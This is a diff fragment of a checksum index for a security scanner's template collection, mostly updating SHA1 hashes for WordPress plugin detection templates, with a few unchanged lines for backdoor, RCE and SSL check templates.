+http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:ede984b4ce734efb80a4e76739cf7ab928759029 -http/technologies/wordpress/plugins/jetpack.yaml:722cfb18d959aafb8afc26c43ea5f1b9310e8ab4 -http/technologies/wordpress/plugins/kadence-blocks.yaml:dd88425752a11b8d27b65ff567fd5c7f5106e78f -http/technologies/wordpress/plugins/kirki.yaml:3e9b6be1c0c47a91c3ffd76853adbd854fec95b1 -http/technologies/wordpress/plugins/leadin.yaml:282ecda7ae4100485836e43caeae5388ab948606 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:87f3beae65c6f66a4ec477c7b9e558992daa5d3c -http/technologies/wordpress/plugins/limit-login-attempts.yaml:4c3c3da712a1507e644a8a619c31a1ddbec76b20 -http/technologies/wordpress/plugins/litespeed-cache.yaml:b0007a8b0e38ecec8766a35500bbc9a165bb5ae9 -http/technologies/wordpress/plugins/loco-translate.yaml:24d49706c8f3b2f7f3604850dfa7dce830d66cb7 -http/technologies/wordpress/plugins/loginizer.yaml:4d9c60f412eaf2e57c8d8614d4ceca82d54af8e5 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:c4bef61dda972f757c550a00b2fe5b50a0de3784 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:22c3c5417d4c8af8a89212aa6ac07a10e71a7732 -http/technologies/wordpress/plugins/mailpoet.yaml:67e27cb5bc2df5693075cf7a9b409c15055fe912 -http/technologies/wordpress/plugins/maintenance.yaml:fabddd6496243a1e21c704ab5b963760c37f1780 -http/technologies/wordpress/plugins/mainwp-child.yaml:9138156d8a2c7be8dcdaf06c5276347befae11c5 -http/technologies/wordpress/plugins/malcare-security.yaml:fdc06e0d715b26710f962088603a001ad5daa995 -http/technologies/wordpress/plugins/megamenu.yaml:75cefa3626597f13c637cda840fb78b2b4ff8ff1 -http/technologies/wordpress/plugins/members.yaml:8b3e2ee51aede3fa700b6858b3cdd6e982c3a841 -http/technologies/wordpress/plugins/meta-box.yaml:c324d861c8109f098a3d60d93ced4a9a18fec695 -http/technologies/wordpress/plugins/metform.yaml:92fd715d65f49ae60d11864e885a4ea8bdcffb60 -http/technologies/wordpress/plugins/ml-slider.yaml:7a96f603d51a0234b7ab39b364d3c7d8b8269c5a -http/technologies/wordpress/plugins/newsletter.yaml:0bc7ede2432ce5062414e91cbf31b4b57f08fd2b -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:2259f3e681019c6343762f6ed56343b061ca49b7 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:87ca6a94e7bffc305bf42bf5e92a72d382038897 -http/technologies/wordpress/plugins/ninja-forms.yaml:7d56c3ddcf42b2d521ecd570362adc6ceb12a8f1 -http/technologies/wordpress/plugins/ocean-extra.yaml:cda378e05af15537da466c7b4debeca5d6909d9c -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:8fc3c31ef5b912595c019787c1c88b06055e98ea -http/technologies/wordpress/plugins/one-click-demo-import.yaml:1b804e49cb1a289cea3b0fab6ecfef080bc79d3e -http/technologies/wordpress/plugins/optinmonster.yaml:1b08e516a103695be4f114bc2c70a776e077ea61 -http/technologies/wordpress/plugins/otter-blocks.yaml:639dc2eb19a0d30e36356b35e5b98d5140349538 -http/technologies/wordpress/plugins/password-protected.yaml:ebe6fdd554f6855d619bd98d76dbccbe744ef2e3 -http/technologies/wordpress/plugins/pdf-embedder.yaml:1b728679886b496441f8e421263e6dd5292f96de +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:98b6dfc3b57c003d57d99b95bf516b9bcadad493 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f6965469b1c2ed0b7d4f3598eb2245f995fd0166 -http/technologies/wordpress/plugins/polylang.yaml:3082c4cccd71c6b020335333f985cd0a3a47f5d9 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:accba860c0824f01d73fab87c911b44c66491dd2 -http/technologies/wordpress/plugins/post-smtp.yaml:86079bfd82ecfe05f41a5f72fa55cce0c153f51e -http/technologies/wordpress/plugins/post-types-order.yaml:45b448df3710b39ed379314e288955a99194df55 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:08f6f1b761ff7eb4b93386a99ee263974c4ab704 -http/technologies/wordpress/plugins/pretty-link.yaml:ac78db275c6b93f2434055c928ef683ec5ad3587 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:8c58860bcef80599d8debd9751d880fe568828e5 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:5cc74a48b304b9e26cbeca26c84824faa7d77aa2 -http/technologies/wordpress/plugins/redirection.yaml:26d61bc05da848467438faacb28d0bfa9365cbb8 -http/technologies/wordpress/plugins/redux-framework.yaml:797ee7403fd614a538a27ce6842b1613cafe3585 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:aa5603a52170fc69e7cca53a9d054559e975d8df -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:d9d3ffe0d24c630d16cbf412b64c3db5a09e2697 -http/technologies/wordpress/plugins/safe-svg.yaml:347046db30ffa1db289a09ef4bad92131b7dc9d5 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:f411765e462ad03d66a43c62850b0e9732443c2b -http/technologies/wordpress/plugins/sg-cachepress.yaml:2606734d6dbbf985724b8dc77beca23281bdde99 -http/technologies/wordpress/plugins/sg-security.yaml:1f92f9c936f155c015ea2777b67cf07a536129b0 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a56a0df9a39978ad72f16140a410a9152f8a5edf -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:162b72837807ccd1d4bf18e54e51a491c876e235 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:4debc7be05869829a4ddbafd1408b9dfc3ec3d1f -http/technologies/wordpress/plugins/simple-history.yaml:cf14c9dbcd5a2823b27abbb7f8013927d929aba9 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:aafe30b072ef77b59fd0c8adf8b689b8a8b534ea -http/technologies/wordpress/plugins/siteorigin-panels.yaml:cc15dcea1fcffcf1cd2d7480850750572aefe76f -http/technologies/wordpress/plugins/smart-slider-3.yaml:b7d2a0f1e58ffdb59602c82d93d8ec16f4f74c04 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:cf7a0e594a67d9bf3495083c65ad3dd696091b0d +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:7431bdf1ec1dd11a0ce83200c4e7eecf9035f15c -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:e54b87b0d1993c70a1e79f3586f4b5fcc1f69a1b -http/technologies/wordpress/plugins/sucuri-scanner.yaml:72984603e4f105d8eec4f0ec74fcb882b5feecb9 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:c82e6a886de6dd292ba78f68a5edbb100b802f68 -http/technologies/wordpress/plugins/tablepress.yaml:12a209f39e5d6c5a0ef1273bd990d53400f7477d -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:640cd544c1c6aa44da2d1c41d6e62b909e223cde -http/technologies/wordpress/plugins/templately.yaml:75907b9782d70a0b15bf233ab05b9dcb9fc1a7ae -http/technologies/wordpress/plugins/the-events-calendar.yaml:98f71a2686e68c36f087f762007a51efafb782e1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:8f4358301a38628a2ccf5a6daef44def124d7189 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:4bff59b48f7139ec8dcbf2d14354b692b74b335f -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:c0886c23d9a8291ee06dc643a8e62af1ca0354b5 -http/technologies/wordpress/plugins/under-construction-page.yaml:47c02b2c5453a29ea422b70e57c3dc45b0f734fd +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:1764b3b37065c0af6c554171dfcc10792e0c5218 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:1e08b06e54eb3400dcf8032cbe3d3560f1868e3a +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:34d7011ca6ba5dc06fdc60b30eda88ddf49fe3e1 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e2b5f4e45bb9362be1d7cd52d26240127fe0406d -http/technologies/wordpress/plugins/webp-express.yaml:deda558254c7bb7ec3502a4f0a0d2cb82a534b60 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:09b5bb138eb5c0d82e39401cdfca5fbb450f75b5 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:54ba6ea96a891b73a797f2d640ad80983772c45c -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:d1f0884ba3e2c41f15324f627bf299b2ceec25d7 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:e94a04f58201c61f74360ce2d429191ff8bbef4a +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c02d8b8907167efc1957f4bb90b3865efa050489 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:bcce8f61b06ab4e7860b8965ba66d12d27e5e072 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:c245c089a83d7b886f599c7aee6b213dec672fba -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:be918c0fbc91f2a05a507a4109eb3b8321282ee9 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:4314caa3d6967b53baa3faee5bfaf0865ea33cbb -http/technologies/wordpress/plugins/woocommerce-services.yaml:dc6dc2f31fb27d17a9b2c181afd70f8329f3553a -http/technologies/wordpress/plugins/woocommerce.yaml:6f88d2aa6f14a89e4fe3fd4b03546be6c221c14f -http/technologies/wordpress/plugins/wordfence.yaml:a7dbc70f71758b50f5e8e5541d168e13b0e31ebd -http/technologies/wordpress/plugins/wordpress-importer.yaml:6a70202c2965a18616513625fb01fe73e49d0daa -http/technologies/wordpress/plugins/wordpress-seo.yaml:64d417c0759af592d6f1207c635c05f2614b1e87 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:925e17a4bc0b5846249b0250e72140f9f9aa4b14 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:4d60f9bc688f5bcc53471a6efa1ae88339c4e5ab -http/technologies/wordpress/plugins/wp-file-manager.yaml:fedf1a15ff96e6bf4b4f726ab772e2c2fe9e0831 -http/technologies/wordpress/plugins/wp-google-maps.yaml:d1bf03acbf874ae4673386de463e9d75a2e9c43c -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:d60f81c9e6ab1d24ddc6f35588fc45622b7fa215 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:daf12a156ae8d7c6c147cec18087fa7701259659 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:0c53b252e195671dd3a87b48dafba308561f52db -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:a97eeb8fb7952c4eb0522cb31812f2648b36f15e -http/technologies/wordpress/plugins/wp-optimize.yaml:c6d9e8669ca1b890e031bcaeb80d6aeaf380c2be -http/technologies/wordpress/plugins/wp-pagenavi.yaml:0b19cd3d8934acd4f9c674d9e9fdc0f22ba6da2c -http/technologies/wordpress/plugins/wp-reset.yaml:e8a73eda5c3734c8496b26fd1c045713336ba61e -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4e31ae559d8e414aaea3dd88e12a839f78dc60f5 -http/technologies/wordpress/plugins/wp-rollback.yaml:d334260671f7da5686ae5880d859c17fd4cc73fa -http/technologies/wordpress/plugins/wp-seopress.yaml:527eb2cf14508c3a38adbc4a745aabc23e705436 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4a744e660d68ef8ff9d6be727e1e753de300248b -http/technologies/wordpress/plugins/wp-smushit.yaml:85909bdd00880e138f99cb746cc52509bab4997d -http/technologies/wordpress/plugins/wp-statistics.yaml:50dd652e2b870e320d1f3dfcc8466e58ffa42f60 -http/technologies/wordpress/plugins/wp-super-cache.yaml:c75585c11b43540c5be523f1fcc5c92d7e879699 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:184a0bca0d198ff725dae2f1851e442157973362 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:e929146b632d95b570d2260d1496dd6d24011b02 -http/technologies/wordpress/plugins/wpforms-lite.yaml:8e76acc5264bd0c2a903afacc47ff08b55e0c794 -http/technologies/wordpress/plugins/wps-hide-login.yaml:88ca9409423c21d5a189a1c9c07d4ca2720ab964 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:66b06918fc4c54c8e10cd6a222be50a58ce05e96 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:8b4ba30f1bc172790a73d0dacdad66477042488c +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7795,7 +7797,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 -http/vulnerabilities/backdoor/polyfill-backdoor.yaml:12ec4ad8b5b872056c773edf10c4e167977b7f6b +http/vulnerabilities/backdoor/polyfill-backdoor.yaml:45b5279cb49b4f23febd738646c752c564859b53 http/vulnerabilities/bsphp-info.yaml:46e581c10e555d13d42b306e5ba11288df471949 http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 @@ -8882,7 +8884,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 